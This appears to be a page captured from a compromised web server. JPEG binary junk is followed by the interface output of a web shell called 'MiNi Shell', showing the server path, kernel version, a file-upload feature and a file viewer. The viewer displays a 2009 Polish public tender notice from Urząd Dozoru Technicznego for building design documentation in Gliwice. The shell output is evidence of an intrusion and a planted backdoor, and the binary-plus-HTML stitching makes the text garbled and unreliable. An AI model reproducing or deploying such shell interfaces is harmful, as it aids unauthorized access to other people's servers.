JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/76297-N-2009.html

<p class="kh_header"><b>Warszawa: Wykonanie dokumentacji projektowo-kosztorysowej kapitalnego remontu wraz z przebudową nowo zakupionego budynku oraz jego połączenie z istniejącym budynkiem Oddziału UDT w Gliwicach przy ul. Robotniczej 4a</b><br>
<b>Numer ogłoszenia: 76297 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Dozoru Technicznego , ul. Szczęśliwicka 34, 02-353 Warszawa, woj. mazowieckie, tel. 022 5722100, faks 022 5722388.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.udt.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej kapitalnego remontu wraz z przebudową nowo zakupionego budynku oraz jego połączenie z istniejącym budynkiem Oddziału UDT w Gliwicach przy ul. Robotniczej 4a.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.  Opis przedmiotu zamówienia

a)	Przedmiotem zamówienia jest wykonanie dokumentacji projektowej na podstawie dokumentów załączonych do SIWZ. 
b)	Opis przedmiotu zamówienia - Zakres prac:
Projektant zobowiązuje się do wykonania pełnobranżowej dokumentacji projektowo-kosztorysowej (projektu architektoniczno-budowlanego oraz wykonawczego) kapitalnego remontu wraz z przebudową nowo zakupionego budynku oraz połączeniem go z istniejącym budynkiem administracyjno - biurowym Oddziału Urzędu Dozoru Technicznego w Gliwicach, przy ul. Robotniczej 4a.
1.	Zakres opracowania:
1.1 Koncepcja architektoniczna, wykonana na podstawie:
                                    a) założeń projektowych, zamieszczonych w Projekcie koncepcji zagospodarowania budynku na  potrzeby UDT O Gliwice, załącznik nr 7 do SIWZ
b) dokumentacji projektowo-kosztorysowej klimatyzacji i wentylacji mechanicznej wraz z pracami malarskimi w Oddziale Gliwice:  
przedmiar robót instalacji klimatyzacji i wentylacji - załącznik nr 9 do SIWZ
kosztorys ślepy i przedmiar roboty remontowo malarskie - załącznik nr 10 do SIWZ
 przedmiar roboty instalacje elektryczne zasilające urządzenia klimatyzacji i wentylacji   - załącznik nr 11 do SIWZ
    przedmiar roboty półpośredni układ pomiarowy- załącznik nr 12 do SIWZ
    decyzja administracyjna nr AB-7353-1226-2008 - załącznik nr 13 do SIWZ
     projekt budowlano - wykonawczy branża technologiczna - załącznik nr 14 do SIWZ
     projekt budowlany fundamentu dla zestawu klimatyzatorów - załącznik nr15 do SIWZ
      projekt budowlano - wykonawczy branża elektryczna - załącznik nr 16 do SIWZ
 projekt budowlano wykonawczy przebudowy rozliczeniowego układu pomiaru energii  - załącznik nr 17 do SIWZ
 specyfikacja techniczna wykonania i odbioru roboty instalacje elektryczne - załącznik nr 18 do SIWZ
 specyfikacja techniczna wykonania i odbioru roboty - pomiar energii - załącznik nr 19 do SIWZ
wyjaśnienia pisma z dnia 29 kwietnia 2009 r. - załącznik nr 20 do SIWZ
c)	 notatki służbowej z dnia 14.12.2007 r. odnośnie ogólnych wymagań dla nowo projektowanych sieci strukturalnych i dedykowanych instalacji zasilających w budynkach UDT, załącznik nr 8 do SIWZ
1.2  projekt budowlano - wykonawczy wraz z zagospodarowaniem terenu w branży architektonicznej,
1.3   projekt budowlano - wykonawczy w branży konstrukcyjnej wraz z opisem technologii prowadzenia prac rozbiórkowych,
1.4	 projekt budowlano - wykonawczy w branży instalacyjnej:
instalacje sanitarne (wod-kan, deszczówka, centralne ogrzewanie wraz z węzłem cieplnym z sieci miejskiej, gazowa, kotłownia gazowa, wentylacja mechaniczna, klimatyzacja),
instalacje elektryczne (elektryczne ogólne, oświetlenie budynku i terenu, rozdzielnia główna, siła, instalacja odgromowa),
instalacje niskoprądowe (teletechniczna, rtv, komputerowa i UPS wraz ze współpracą z siecią internetową, sygnał p.-poż., monitoring wraz z kontrolą dostępu, nagłośnienie),
1.5  projekt aranżacji i wyposażenia wnętrz,
1.6  przedmiar robót, 
1.7  kosztorys inwestorski,
1.8  specyfikacja techniczna wykonania i odbioru robót,
1.9 specyfikacja materiałowa,
1.10 informacja na potrzeby sporządzenia planu BIOZ.
 2. 	Dokumentacja projektowo - kosztorysowa obejmować również będzie wykonanie (tylko   w przypadku wystąpienia  konieczności):
a)  Projektu budowlano - wykonawczego doprowadzenia nowych bądź przebudowy   dotychczas użytkowanych przyłączy do budynku, od istniejących sieci miejskich,
b)    przedmiaru robót, 
c)    kosztorysu inwestorskiego,
d)    specyfikacji technicznej wykonania i odbioru robót,
e)    specyfikacji materiałowej,
f)    informacji na potrzeby sporządzenia planu BIOZ.
3.   Projektant zobowiązuje się do uzyskania pozwolenia na budowę w formie prawomocnej decyzji, w terminie do dnia ............................
 4.     Na podstawie niniejszej umowy Projektant zobowiązuje się także do pełnienia nadzoru autorskiego nad wszelkimi pracami budowlanymi wykonywanymi na podstawie dokumentacji projektowej, o której mowa w ust. 1..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
a)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
b)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia, tj.
1)	Wykonawca wykonał, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia (tj. wykonanie dokumentacji projektowo - kosztorysowej remontu lub adaptacji lub modernizacji budynku biurowego lub administracyjnego), o wartości nie mniejszej niż 100.000 PLN brutto;
2)	Wykonawca dysponuje min. 1 osobą posiadającą odpowiednie uprawnienia do projektowania w każdej z niżej wymienione specjalności branży:
- architektonicznej,
              - konstrukcyjno-budowlanej, 
              - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, 
              - instalacyjnej w zakresie sieci, instalacji urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. 
                     
Osobami wymienionymi w wykazie, o którym mowa powyżej mogą być obywatele  państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, zgodnie z art. 12a ustawy Prawo budowlane oraz zgodnie z regulaminem postępowania w sprawie uznawania kwalifikacji zawodowych w budownictwie w Polsce osób z państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej.

c)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2.    Ocena spełnienia warunków w postępowaniu o zamówienie publiczne.
Ocena spełnienia w.w warunków zostanie dokonana zgodnie z formułą spełnia  nie spełniaw oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych w dziale IX niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż wyżej wymienione warunki Wykonawca spełnił. 

Niespełnienie któregokolwiek z wyzej wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania oraz odrzuceniem oferty.

Wykonawcy, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty będą zawierają błędy zostaną wykluczeni z postępowania z zastrzeżeniem art. 26 ust. 3 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy wraz z ofertą składają:
POTWIERDZENIE WARUNKÓW UDZIAŁU W POSTĘPOWANIU:
 1) wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia (wykonanie dokumentacji projektowo - kosztorysowej remontu adaptacji modernizacji budynku biurowego administracyjnego) z podaniem ich wartości brutto, daty wykonania i odbiorców (nazwa, adres, tel. fax.) oraz załączenie dokumentów potwierdzających, że te usługi zostały wykonane należycie; wzór wykazu usług stanowi załącznik nr 4 do SIWZ;
2)  oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia publicznego, o których mowa w art. 22 ust.1 ustawy Prawo zamówień publicznych - zgodnie z załącznikiem nr 2 do SIWZ;
3)  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4)  wykaz osób, z którego będzie wynikać, że Wykonawca dysponuje min. 1 osobą posiadającą odpowiednie uprawnienia budowlane do projektowania w każdej z niżej wymienionych specjalności branży
                -  architektonicznej,
              - konstrukcyjno-budowlanej, 
              - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, 
              - instalacyjnej w zakresie sieci, instalacji urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. 

Wzór wykazu stanowi załącznik nr 6 do SIWZ.
5)  dokumenty potwierdzające przygotowanie zawodowe osób wskazanych w wyżej wymienionych wykazie, tj.  odpowiednie uprawnienia budowlane do projektowania w każdej z niżej wymienionych specjalności:
                    - architektonicznej,
              - konstrukcyjno-budowlanej, 
              - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, 
              - instalacyjnej w zakresie sieci, instalacji urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. 

zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz.U. z 2006 r. Nr 156, poz. 1128 z późn. zmianami). W przypadku uprawnień budowlanych wydawanych po 1994 roku (tj. zgodnych z wymogami ustawy Prawo budowlane) wymagane będą uprawnienia bez ograniczeń.
6) aktualne na dzień składania ofert zaświadczenie o przynależności do właściwej Izby Samorządu Zawodowego, zgodnie z ustawą z 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów - (Dz.U. z 2001 r. nr 5 poz. 42, z późn. zmianami) - dla każdej osoby wykazanej w wykazie, o którym mówi pkt. 4. 

W przypadku zaświadczenia o przynależności do właściwej Izby Samorządu Zawodowego wykonawca może złożyć równoważny dokument, (jeżeli dotyczy) odpowiednio do kraju, jaki reprezentuje.

INNE DOKUMENTY I OŚWIADCZENIE, KTÓRE NALEŻY ZŁOŻYĆ WRAZ Z OFERTĄ:
7)    wypełniony formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 do SIWZ,
8)    oświadczenie o zatrudnieniu nie zatrudnieniu podwykonawców - załącznik nr 5 do SIWZ,

UWAGA: w przypadku wskazania podwykonawców, Wykonawca zobowiązany jest załączyć do oferty wypełnione i podpisane wyżej wymienionych oświadczenie z zakresem prac, jakie Wykonawca planuje zlecić podwykonawcy. Brak dołączenia do oferty wyżej wymienione oświadczenia Zamawiający uzna za potwierdzenie, że Wykonawca wykona całość prac bez udziału podwykonawców.

2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1 ppkt. 3) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.

3.	Dokumenty, o których mowa w pkt. 2 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

4.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 2 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepis pkt. 3 stosuje się odpowiednio.

5.	Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność 
z oryginałem przez Wykonawcę (osobę uprawnioną do podpisania oferty).

6.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.

7.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

8. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w konsorcjum). W takim przypadku ich oferta musi spełniać następujące wymagania:

w odniesieniu do wymagań postawionych przez Zamawiającego każdy z przedsiębiorców wspólnie składających ofertę oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych tj. każdy z partnerów składa osobno dokumenty określone w pkt 1. ppkt. 3). Reszta dokumentów może być złożona wspólnie, przy czym oświadczenie zgodnie z załącznikiem nr 2 do SIWZ każdy Wykonawca musi złożyć osobno w zakresie określonym w pkt. 4) oświadczenia, a w stosunku do punktu 1), 2) i 3) oświadczenie może być złożone wspólnie.
oferta składana wspólnie musi być podpisana przez przedstawiciela upoważnionego przez wszystkich występujących wspólnie uczestników postępowania lub musi być podpisana przez każdego uczestnika występującego wspólnie,
oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich  Wykonawców występujących wspólnie, 
Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Umocowanie może wynikać z treści umowy łączącej Wykonawców lub zostać przedłożone oddzielnie wraz z ofertą,

Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania. 

wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem (liderem), 
wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na Wykonawcę; w miejscu np. nazwa i adres Wykonawcy należy wpisać dane dotyczące podmiotów występujących wspólnie.
Zamawiający przed zawarciem umowy o udzielenie zamówienia publicznego będzie żądał dostarczenia umowy regulującej współpracę podmiotów występujących wspólnie.

UWAGA!!! Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w rozdz. IX pkt 1 SIWZ, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia ofera Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożenie na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane usługi wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.udt.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.udt.gov.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2009 godzina 12:00, miejsce: Urząd Dozoru Technicznego
Szczęśliwicka 34
02-353 Warszawa
poz.7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com